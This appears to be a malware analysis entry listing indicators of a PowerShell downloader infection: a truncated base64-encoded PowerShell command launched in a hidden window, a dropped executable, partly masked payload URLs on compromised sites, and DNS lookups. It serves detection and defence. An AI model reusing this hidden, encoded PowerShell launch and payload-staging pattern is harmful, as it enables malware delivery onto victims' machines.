Technical information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAG0AcQB1AGQAcABjAG4AcgBqAHMAPQAnAEkAdwBzAG8AYgBiAHAAZgAnADsAJABJAHoAYQByAGQAYgBmAHUAcAAgAD0AIAAnAD...
- %HOMEPATH%\424.exe
- http://www.ci#######nstructionlending.com/wp-admin/s92708/
- http://www.vi####talyca.com/softaculous/gy3l713/
- DNS ASK ci#######nstructionlending.com
- DNS ASK to#####kdownload.com
- DNS ASK te###.#ode2laroute.com
- DNS ASK sa#######haam.000webhostapp.com
- DNS ASK vi####talyca.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e PAAjACAAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AbQBpAGMAcgBvAHMAbwBmAHQALgBjAG8AbQAvACAAIwA+ACAAJABPAG0AcQB1AGQAcABjAG4AcgBqAHMAPQAnAEkAdwBzAG8AYgBiAHAAZgAnADsAJABJAHoAYQByAGQAYgBmAHUAcAAgAD0AIAAnAD...' (with a hidden window)